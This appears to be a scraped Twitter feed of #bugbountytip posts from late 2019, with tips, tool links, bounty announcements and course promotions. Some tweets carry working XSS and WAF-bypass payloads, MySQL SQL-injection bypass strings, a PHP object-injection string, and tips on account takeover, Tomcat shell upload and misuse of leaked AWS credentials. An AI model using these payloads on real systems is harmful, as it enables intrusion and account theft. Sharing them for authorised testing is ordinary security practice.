3 #BugbountyTip: Change request parameters from scalar (val=foo) to array (val[]=foo) for #XSS #Bugbounty #OWASP https://t.co/eVOBz8WtwT
Tannay Bagga
@BaggaTannay


2019-11-10 19:56:19
0 Getting my hands on Docker for building #Recon tools. I must say it makes the installation task so hassle free! #bugbountytips #opensource #BugBountyTip #Docker
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 19:21:56
0 Mass RDP ATTACKS #BlueKeep Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/NTSGfnFBo5
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 18:49:55
2 Linux Commands for Bug Hunters and Hackers !! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/GIgkZB5KK9
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:33:29
2 Sometimes login endpoints submit the password twice in POST data. If you need to perform a credentials guessing attack with Burp Suite: 1) Use Cluster bomb, 2) Use "Copy other payload" to copy from 1st password placeholder. See pictures. #burpsuitetip #bugbounty #bugbountytip https://t.co/pY7ga2bbsb
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:20:31
7 I've been testing newer versions of #ffuf by @joohoi. It's dope being able to fuzz for files w/ 100 threads at 350reqs/sec w/ nearly no failures/stability issues! If you need BOTH stability & speed, then #ffuf is the only tool you need for web fuzzing. #bugbounty #BugBountyTip https://t.co/bWhywAAvVx
Ismayil Tahmazov
@Tismayil1


2019-11-10 18:20:10
5 Sometimes we have to do the impossible. SQL'Injection Attempt from Remote Site With this method: XSS, SQL'i, CSRF attacks can be done. Failure to filter the data from the remote source leaves open doors for such attacks. #bugbountytips #BugBountyTip #bugbounty #whitehat https://t.co/bb29oBdpGL
Infected Drake
@0xInfection


2019-11-10 13:33:03
8 Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. 😉 https://t.co/OKUlxHNUO3 #infosec #appsec #bugbounty #bugbountytip https://t.co/5NMCR7YRMq
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 11:04:00
3 Indispensable xss bypass payload. ">'><details/open/ontoggle=confirm('XSS')> #BugBounty #XSS #BugBountyTip #infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-10 08:26:32
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5ryR3 #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
ALL ABOUT HACKER
@AboutHacking


2019-11-10 07:35:08
0 Cross Site Scripting attack Basic to advance [ part 6] Read:https://t.co/H4hJHhsdO5 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/HkDrjRxblY
Shantanu Kulkarni
@Iamshantanukul


2019-11-10 06:58:55
0 If you can determine which open source packages are used in the application you are attacking, you can download these and perform a code review or install them to experiment on. A vulnerability in any of these may be exploitable to compromise the wider application #BugBountyTip #bugcrowd #hackerone
Hussein Daher
@HusseiN98D


2019-11-10 00:02:37
15 Sharing one of my secrets #BugBountyTip When discovering subdomains/domains/assets owned by a company, use the Google Analytics ID to expand your attack surface. The ID is in the HTML code. Reverse search then: https://t.co/fkWSWj8GUn RT once this helps! #bugbountytips #infosec
ALL ABOUT HACKER
@AboutHacking


2019-11-09 20:55:07
0 Cross Site Scripting Attack Series [ Basic to Advance] Read: https://t.co/xZTIBcHlHr #cybersecurity #bugbounty #bugbountytip #bugbountytips #hacking https://t.co/QCQPhiYPtu
Murdockz
@Murdockz_CEH


2019-11-09 20:45:45
1 Remember this picture and date it was posted. When I share that I was rewarded XXXXX amount for a bug...you now know why. Step back learn and work hard to hit harder. 😎 #bugbountytips #bugbountytip #StayHumble https://t.co/69lsVZNGPt
Paulos Yibelo
@PaulosYibelo


2019-11-09 18:04:05
1 I started seeing posts about escalating bugs for maximum impact. This is an article I wrote about how to escalate XSS for maximum gain back in Feb 2018: https://t.co/W7sZLunr6N #BugBounty #BugBountyTip #BoomerAdvice
Avi
@avileox


2019-11-09 03:28:43
2 Small Python library that makes it easy to exploit race conditions in web apps with Requests https://t.co/bkBGTn8SNu #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-09 00:11:43
0 Less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ismayil Tahmazov
@Tismayil1


2019-11-08 23:16:27
2 I Earned $XXXX OS Command Injection Private Program. Used Repos 1 : Dir Searcher : https://t.co/1L6MutcaEc 2 : Sub Scanner : https://t.co/ZRcZb6ovUa #BugBounty #bugbountytips #bugbountytip #whitehat https://t.co/OPOc6mVkTc
Ammar Amer🇸🇾
@cry__pto


2019-11-08 21:34:35
7 -Hacking for Beginners.pdf: https://t.co/aQoLE86OKL -HTB: CTF.pdf: https://t.co/PCbL2YSGZR -HTB_ Hackback.pdf: https://t.co/Jz1m0qlU2a -Keep Calm and Hack The Box - Devel.pdf: https://t.co/Jz1m0qlU2a #bugbountytips #Hacking #redteam #Pentesting #infosec #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-08 13:20:02
0 Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-11-07 23:37:34
1 Great stuff here, check this out! #bugbountytip #IDOR #BOLA https://t.co/2q0MbSeOie
Arif Khan
@payloadartist


2019-11-07 21:25:23
2 LiveTargetsFinder - tool to automate #bugbounty recon. #bugbountytip https://t.co/aP0oQC0qdr
Nick || hunt4p1zza
@ngkogkos


2019-11-07 17:47:02
0 Agree with Jason here, it is a good #bugbountytip but need to be cautious. I would only set up an AutoRepeater/Burp rule for true/false, if I was highly familiar with my test user's data and the website's behavior. #bugbounty https://t.co/iMVChw8zkX
Karna
@karna__1


2019-11-07 15:41:35
0 Burned out? Bored? Need a really cool time-pass? I dare you to enter https://t.co/sJMORd6dlX All the @PortSwiggerRes content are 🔥🔥🔥 Soo much to learn. Just go bring your geek-self out! #research #infosec #bugbountytip #bugbountytips #hackers #hacking #geeks
warbid
@id_warb


2019-11-07 14:41:19
0 Use PDO they said PDO will save you from SQL injections they said #bugbountytip https://t.co/NUtccgqMR7
intigriti
@intigriti


2019-11-07 13:04:04
18 Looking for business logic flaws 👀? Flows with multiple steps are a good place to start. Try to skip steps or execute them in a wrong order and see what happens 😈 Thanks for the #BugBountyTip, @InsiderPhD! https://t.co/bw6Z28K6fE
bugbountytip
@a_l_e_r_t_1_


2019-11-07 06:51:34
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
darkmage
@therealdarkmage


2019-11-06 22:22:45
0 Got a $50 Amazon giftcard for reporting an #XSS to a company with no #bugbounty program. #bugbountytip: If you find a bug on a website/app that does not appear to have an active program, take heart and have courage and faith! Report it and see if they can compensate you🤘#infosec https://t.co/2Kql2FconG
Vinothkumar
@vinothpkumar


2019-11-06 16:57:18
0 Wrote a blog on "Publicly Exposed AWS SNS Topics" #bugbounty #Bugbountytip #aws #security https://t.co/wfNbUHHpjT
Pavandeep
@Pavandep8


2019-11-06 16:12:14
2 Look what I shared: When I found iframe injection and illegal redirect (dom based) @MIUI| #Hacker #privacy #Bugbountytip #security https://t.co/TnU1JRjUDm
intigriti
@intigriti


2019-11-06 15:34:54
12 Sometimes, TRUE is all you need ✅. Use @Burp_Suite's match and replace to enable new functionalities in the UI and expand your attack surface! Thanks for the #BugBountyTip, @anshuman_bh! https://t.co/D55uMIl6Sx
Aditya Soni
@hetroublemakr


2019-11-06 14:43:08
0 Still any confusion about CVE2019 14287 Go and watch this video #infosec #Bugbountytip https://t.co/i4Mye3n7qO
Jinone
@jinonehk


2019-11-06 04:38:05
4 My first bounty blog post Get the full content of the private project internal network via ssrf https://t.co/MhKS2w6L0Z Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Arif Khan
@payloadartist


2019-11-05 19:42:20
2 Very creative way to Abuse (cross-site authenticated) HEAD Requests leading to GitHub Oauth Bypass by @not_aardvark https://t.co/dX0lF2LVJ4 #bugbounty #bugbountytip
Abay
@abaykandotcom


2019-11-05 18:59:39
0 Actually these 2 findings are invalid. However, the interesting part is where and how the XSS payload is triggered~ #ripenglish #XSS #bugbountytip #bugbounties #bugbounty https://t.co/idpR2U41zn
YogoshaOfficial
@YogoshaOfficial


2019-11-05 16:10:19
5 [#Bugbountytip] Tomcat is used, yet port 8080 is filtered? Use port 8009, which is "often" forgotten. It uses AJP instead of HTTP, so use your local Apache as a local proxy to convert traffic from HTTP to AJP. ProxyPass / ajp://target-ip:8009/ ProxyPassReverse / ajp://target-ip:8009/
Felix Kybranz
@_cybrg


2019-11-05 12:53:54
0 Got too many results from Google dorks? Remove uninteresting buzzwords with: "-" site:http://paypal. com -demo -Capital Why did I miss that for so long!? Finding that was a nice wtf-moment😇 #BugBounty #bugbountytips #bugbountytip #bugbounties
m0z
@LooseSecurity


2019-11-05 12:05:14
6 #BugBounty #bugbountytip #XSS Have an XSS and want to get account takeover but document.cookie isn't working? Try a payload which grabs the CSRF token, and then sends a request to the change email endpoint to change it to your email! Now your bug is twice as valuable. ;)
bugbountytip
@a_l_e_r_t_1_


2019-11-05 07:39:35
0 Reflected XSS on Magento #BugBountyTip #BugBountyTips https://t.co/KQSpPV2Q0m via @YouTube
Anshuman Pattnaik
@anspattnaik


2019-11-05 00:29:38
0 #bugbountytip #Google I got a strange thing to know that if google user gives certain access to a third party application then as per google policy guidelines that third application has complete ownership of the user's private information such Gmail, Drive and other services.
(((Gamliel)))
@Gamliel_InfoSec


2019-11-05 00:19:18
0 If u are pentesting/bug hunting in some web app that uses JSON and it runs on IIS, don't forget to test "JSON Parameter Pollution". Under some conditions u can poisoning some parameters, break Javascript context and voilá ... #XSS #hack2learn #GivingBack2Community #BugBountyTip https://t.co/MjN3o8pVgH
m0z
@LooseSecurity


2019-11-04 22:46:32
3 Here's a useful #XSS payload which doesn't suffix "prompt" with any parenthesis! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
bugbountytip
@a_l_e_r_t_1_


2019-11-04 21:22:01
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ashish Kunwar
@D0rkerDevil


2019-11-04 15:32:18
1 Found Java_rmi service on port 8001, used the nmap "rmi-dumpregistry" script to dump the class path. Found some goodies .. #bugbounty #bugbountytips #bugbountytip #security
KNOXSS
@knoxss_me


2019-11-04 13:46:16
1 One of #KNOXSS exclusive features! #XSS #bugbountytip https://t.co/SDP6thBcrz
Ashish Kunwar
@D0rkerDevil


2019-11-04 12:21:16
1 #bugbountytip look out for port 2181 - zookeeper , check if you are able to commands , as there is no auth in place by default in zookeeper installations. #bountytip #bugbountytips #protips #bugbounty #security
Leonel Emiliano
@leoalgare


2019-11-04 12:09:59
0 POST request with JSON body with no CSRF token but also no CORS? Always test changing the Content-Type to urlencoded... It works like a charm. #bugbountytips #bugbountytip #hackerone #CSRF #Hacker0x01
Milind Purswani
@MilindPurswani


2019-11-03 17:38:13
0 Had a pyserver running on my VPS for days. Shodan scanned it and saved the response lol. Is this how "karma" works? #bugbountytip
VT10 Loading 🥊🥊🔥🔥🔥
@SHIVAPURI12


2019-11-03 17:10:49
1 #MegaStar Lu oorike ayiporu,, aaaaah style,,,aaah energy ,, aaah Grace,, Ever green and Irreplaceable ,, #BossForAReason #MegaStatChiranjeevi Garu ❤️💓❤️ at #bugbountytip finals,, #EmperorOfEntertainment #MegaStar #ChiruForEver Thanks to @StarMaa
Maulik Vaidh🇮🇳 @bsidesahmedabad
@Maulik1827


2019-11-03 15:46:18
0 @bsidesahmedabad 12 Days to go... Are you excited?😃😃 #bsides #bsidesahmedabad #bugbountytip #infosec #hacking #security #conference #BugBounty https://t.co/EjmNa9ukkn
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 🎃
@spyerror


2019-11-03 04:19:08
7 cloudflare {`XSS´} «byPASS» payloads. @spyerror🎯 🥇 $cat /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> 🥈 $cat /<svg%0Aonauxclick=0;[1].some(confirm)// #BugBounty #BugBountyTip #WAF #infosec
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:11:49
0 Bug Reported to Author. 8K+ Active sales. Script after redirect worked admin account then stored to frontend area. #bugbounty #bugbountytips #bugbountytip https://t.co/6N1XwtnN28
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:10:10
0 CodeCanyon Most Popular Item. Found : CSRF -> Stored XSS. 1 - HTML form auto submit to : admin/knowledge_base/article 2 - Payload direct worked after redirect. 3 - Admin area and Frontend area payload stored. 2/1 #bugbounty #bugbountytips #bugbountytip https://t.co/RiUgDz9GHq
Arif Khan
@payloadartist


2019-11-02 18:55:25
1 Good read: Smuggling HTTP requests over fake WebSocket connection by @0ang3el https://t.co/x1CxQyCq7u #bugbounty #bugbountytip
Arif Khan
@payloadartist


2019-11-02 16:21:33
2 Nice write up by @nj_dav on Abusing HTTP hop-by-hop Request Headers https://t.co/cEB4iFqnOG… #bugbounty #bugbountytip
Fisher
@Regala_


2019-11-02 14:28:40
2 Making the most out of live hacking events 101: 📚 Focus on learning 👥 Meet, connect and collaborate 💯 Give your absolute best always 🥳 Have fun and enjoy #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-02 14:27:54
1 Now, Jenkins and Jira vulns are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Arif Khan
@payloadartist


2019-11-02 13:26:40
6 Nice write up by @daveysec on Abusing HTTP hop-by-hop Request Headers https://t.co/3VwrseBOta #bugbounty #bugbountytip
Andri Wahyudi 📂
@andripwn


2019-11-02 09:41:01
0 Remote Code Executions (RCE) - Bypassing Extension .png Private_Programs on @Hacker0x01 sad this duplicate :'( #bugbounty #bugbountytip #rce https://t.co/oMPTakOseD
Nikhil Mahajan
@mahajan344


2019-11-02 09:01:49
1 Thanks @detectify for another payout. #bugbountytip : If you have a vulnerability and that can be validated on the fly, try to automate that bug with #detectify scanner. With the help of automation, you don't have to worry about target :) #bugbounty #automation #ItTakesACrowd https://t.co/LjTNwXk5Ol
bugbountytip
@a_l_e_r_t_1_


2019-11-01 17:32:16
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-01 09:20:33
1 #SWAG 🏆🏆 Symantec 🏆🏆💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/EQfIvhpHD0
Ismayil Tahmazov
@Tismayil1


2019-11-01 07:25:06
0 Yes I Awarded $XXX. @instra Thanks For Bounty. #bugbounty #bugbountytip #bugbountytips
dark_warlord14
@dark_warlord14


2019-10-31 16:25:28
0 One must read blog post for beginners like me. Hats off to the author. #bugbountytips #bugbountytip https://t.co/ZtjGcCmSIz
Arif Khan
@payloadartist


2019-10-31 16:04:44
1 Wanted to add more juice to your #bugbounty recon? Grab this while its hot!!! Pricing is down to $10 from $50. Bonus - if u use my referral code, c5df8625, both of us get 500 credits more!!! #bugbountytip #halloween2019 https://t.co/WWbHqqLSHo
sagar yadav
@sagaryadav8742


2019-10-31 13:01:27
0 Happy to secure @readmeio 😍 Soon I will get a nice #swag from https://t.co/zcDAQyTUV0 Program link :- https://t.co/eRXN5RdYW0 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 https://t.co/NrtLkkroHi
sagar yadav
@sagaryadav8742


2019-10-31 12:52:27
0 @zerocopter swag 😍 Happy to #secure #zerocopter #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/RSdeOn5Kjb
Hussein Daher
@HusseiN98D


2019-10-31 11:01:04
0 Please RT and add your suggestions #bugbounty #infosec #bugbountytip #bugbountytips
Max
@0xw2w


2019-10-31 09:52:20
0 Found a changing session cookie, that applying to the user’s session during login to the account? Try logout CSRF + cookie setting (using XSS/CRLF inj/etc) to takeover a session when the user entered login and password again #bugbountytip #bugbounty #infosec
jub0bs
@jub0bs


2019-10-31 07:38:46
0 #bugbountytip Go deep on recon; go broad on targets.
Samet ŞAHİN
@sametsahinnet


2019-10-31 05:44:47
0 Here a Google dork for finding ports ; inurl:"https://t.co/q4DIBVJDSJ" #BugBountytip #bugbounty #bugbountytips #Hacking #TogetherWeHitHarder https://t.co/UWdzDXZyhf
(((Gamliel)))
@Gamliel_InfoSec


2019-10-31 04:00:38
0 Added to Fav and waiting to test in a new project. #infosec #hacking #bugbountytip #pentesting #oneliner https://t.co/M5HhlBC8uI
Akshansh Jaiswal
@Akshanshjaiswl


2019-10-31 01:22:25
0 Yay, I was awarded a $1,000 bounty on @Hacker0x01! Account takeover->Make victim login to attacker's account->Make victim account unable to login to his original account. https://t.co/JKjOn6nSaA #TogetherWeHitHarder #bugbounty #bugbountytip https://t.co/26tKODyKX4
Shaked Klein Orbach 🇮🇱
@shakedko


2019-10-30 23:10:37
0 Many times I end up finding a test.php with "SIze: 0". I tend to assume that it's there for something, so most likely I will have to guess some parameters. I tried parameth but it didn't work well. Other ideas? #BugBounty #BugBountyTip CC @joohoi - using ffuf
Mohamed R Serwah
@serWazito0


2019-10-30 22:58:55
0 😅 any idea to get privilege escalation after login to ftp using anonymous username ?? #bugbountytip
Ismayil Tahmazov
@Tismayil1


2019-10-30 22:23:15
0 New Fast Subdomain Scanner My First GO experience. Your feedback is important to me. Hopefully it benefits your business. https://t.co/2o2pfa8Pi1 #bugbounty #bugbountytip #bugbountytips https://t.co/HHgGwcRfJ9
bugbountytip
@a_l_e_r_t_1_


2019-10-30 17:57:48
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
m0z
@LooseSecurity


2019-10-30 17:41:20
4 A lot of Self XSS is actually just POST XSS. Check if it has a CSRF token! Use your CSRF bypassing techniques to convert it. I've done this before, turned a useless self xss into a $1,000 vulnerability! Stored self XSS? Try a login CSRF chain! #BugBounty #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-30 16:51:04
0 #bugbountytip #bugbounty Don't use Automated exploit tools regarding CVE-2019-11510 - Pre-auth Arbitrary File Reading. Again I try to manually exploited successfully Data breach staff username and password via Pulse Secure Access. https://t.co/3QcJly45ez
Brute Logic
@brutelogic


2019-10-30 14:50:08
2 POI - #PHP Object Injection Leading zeroes & Arbitrary Chars Example: O:008:"stdClass":0001**s:006:"bypass";b:1;} (almost anything can be used in ** ) #bypass #bugbountytip https://t.co/A1dymKmBXV
Jake
@JCyberSec_


2019-10-30 12:00:16
0 I shall test your theory :: #bugbountytip - Don't share your #bugbountytips on Twitter as others will take your methods/tip and leave you with nothing 💰💰💵 https://t.co/OjTno2m0E1
Ismayil Tahmazov
@Tismayil1


2019-10-30 10:17:36
0 #bugbountytips Private Program Subdomains scanned with : https://t.co/LegySAU3sZ Found new subdomain https://t.co/bLxxHsKcuc -> ApacheTomcat 1 - Dirs scanned found dir : /files/ 2- PUT method tested and worked. 3 - Shell Uploaded. Bounty : $XXX #bugbounty #bugbountytip https://t.co/8BL8bWvETi
Learner
@LearnerHunter


2019-10-30 08:26:48
1 Here is my 3rd blog post -> https://t.co/MEIkF0X64m @TipsBug #bugbountytip Thanks
Ravindra Sisodia
@InfoSecRavindra


2019-10-30 04:22:08
1 #bugbountytip Always use -b flag in sublist3r, always.
Abdelrhman
@OufZayed


2019-10-30 02:38:45
0 Subdomains Enumeration Cheat Sheet | via:@PentesterLand https://t.co/muezGpC4xg | #recon #bugbountytip
m0z
@LooseSecurity


2019-10-30 00:49:12
0 We're now at 500 members! #BugBounty #bugbountytip #bugbountytips #bugbounties https://t.co/VAYxaqFQNI
👻in🐚
@0xerror


2019-10-29 22:45:18
0 SQLi News: @brutelogic: 'Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip ' https://t.co/LCr62t6TKq, see more https://t.co/LbVOSRg1RN
Security Executions Code
@pwn0sec


2019-10-29 20:58:39
0 Information security & Penetration testing new facebook https://t.co/eW4Eo49aMC #bugbounty #bugbountytip #ssrf
Ismayil Tahmazov
@Tismayil1


2019-10-29 20:37:49
0 Application webview URL injection. APK decompiled and scanned. Found function : goSupport( url ) Created test for injection : com.example.auth://https://t.co/mJqV80lTKH Result : Application opened then webview redirect to my url. #BugBounty #bugbountytip #bugbountytips https://t.co/3CAwg0cnsO
bugbountytip
@a_l_e_r_t_1_


2019-10-29 18:39:22
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 18:29:19
7 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:09:22
0 The Web In Depth https://t.co/juiE7cWi2g Follow Us 💰💰💰💰 https://t.co/iNczOcXY13 Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:06:03
0 How To Become A Hacker Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/iYO8p512I4
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:00:50
0 Microsoft Tackles Election Security with Bug Bounties Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #hackerone https://t.co/QIBjof1ffv
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 16:57:03
0 Bug Bounty — Tips / Tricks / JS (JavaScript Files) #Bugbounty #BugBountyTip #BugBountyTips https://t.co/GTENhwO3Qz
Avinash Jain
@logicbomb_1


2019-10-29 16:11:31
4 For developers- While developing apps with Spring boot, make sure you don't publically expose below endpoints. For Pentesters/Bug Bounty hunters- Check for below endpoints, it may contain sensitive information. #infosec #bugbounty #bugbountytip https://t.co/B5GJNJ6U4g
Shantanu Kulkarni
@Iamshantanukul


2019-10-29 14:20:45
0 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` Thanks to @rodoassis #SQLi #bypass #bugbountytip #bugbounty #hackerone #bugcrowd
Brute Logic
@brutelogic


2019-10-29 14:16:22
36 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip https://t.co/f7tKJFOcGs
Harshal
@Harshal81835744


2019-10-29 10:32:31
0 cloudflare «XSS» payload to bypass protection. {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} #BugBounty #BugBountyTip #WAF #infosec
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 09:02:16
5 Bug Bounty — Tips / Tricks / JS (JavaScript Files) Follow Us Bug Bounty $$$$-- https://t.co/iNczOcGmCt https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
Sayaan Alam
@alamsayaan


2019-10-29 04:51:56
0 It was Really a Long Way.... Finally On Google HOF @GoogleVRP #bugbounty #bugbountytips #togetherwehitharder #bugbountytip #hacking https://t.co/tB7cG6Ylyu
tololovejoi
@tolo7010


2019-10-29 03:29:31
0 Vulnerability gets your report triaged. Impact gets your report rewarded #bugbounty #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-29 01:17:49
0 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-10-28 14:19:16
19 Just an obfuscated alternative to alert(1): https://t.co/JzLTOrQIgp`javas\cript:al\ert(1)` PoC: https://t.co/Xpca5KfJtf #XSS #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:44
2 Topic about Open redirect https://t.co/DfW5qOqhg5 #BugBounty #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:24
0 Topic about Open redirect https://t.co/uBte9Ledhr #BugBounty #bugbountytip
Guhan Raja (குகன் ராஜா)
@havocgwen


2019-10-28 11:49:19
0 Check API requests by adding an invalid parameter sometimes it will be reflected as error in HTML and leads to XSS :) #bugbounty #bugbountytip #API #xss
PikaChu
@intx0x80


2019-10-28 10:15:37
0 PHP Execution 0-Day Discovered in Real World CTF Exercise https://t.co/VPLYXj5f1u #bugbountytip
Λявєη
@spenkkkkk


2019-10-28 09:32:16
0 Does subdomain takeover work for https://t.co/3MKBF2BrBG? #bugbounty #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-28 06:35:00
0 Does anyone know what is going on here... I'm getting multiple profiles of Google HOF @GoogleVRP #bugbounty #bugbountytip #bugbountytips #bugbountyhelp #togetherwehitharder #google #hacking https://t.co/VOPcbCghWi
miraitowa
@miraitowa1


2019-10-28 00:26:07
1 Hacking JSON Web Tokens (JWTs) by @vickieli7 https://t.co/xR60oBxe7d #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-27 21:17:25
1 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Mahmoud Osama
@Mahmoud0x00


2019-10-27 16:34:59
3 #bugbountytip if you could to reach out to AWS credentials, Configure them in your terminal and then list s3 buckets `aws s3 ls` look for buckets with `AMAZON_SES_SETUP_NOTIFICATION` file, then you will have access to all emails got sent to this email + Ticket trick,You are in!!
Hendrik
@hendrikvb


2019-10-27 13:21:54
0 Silly @Burp_Suite trick of the day: Use advanced scope control for auto-scoping and unscoping, based on regex for ports, files, ports and protocols. #Burp #bugbountytip
SΛKYB
@sakyb7


2019-10-27 08:22:50
0 Hey guys, having hard time to understand http smuggling request.. portswigger web security challenge Video solutions: https://t.co/hZ8CGt6V61 (Basic CL TL Vulnerability) Find all solutions on this YT channel #bugbountytip #bugbounty
tololovejoi
@tolo7010


2019-10-27 01:55:07
0 Security is not so hard. You just need to know the concept #bugbounty #bugbountytip
Learner
@LearnerHunter


2019-10-27 01:06:18
1 Hello friends here is my new blog post in Bug Bounty Writeup Summary -> Please give suggestions/ideas after read Thanks https://t.co/wm0JvWB6Qt #bugbountytip #bugbounty
m0z
@LooseSecurity


2019-10-26 17:43:52
0 The best hacking tool is your brain. Train it! :D #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-26 16:44:55
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Sayaan Alam
@alamsayaan


2019-10-26 13:38:23
0 @lcblnc I had found a domain where Access control allow origin - true X frame option - sameorigin... Is it exploitable ...if yes then how.. #bugbounty #bugbountytips #bugbountytip #togetherwehitharder
bugbountytip
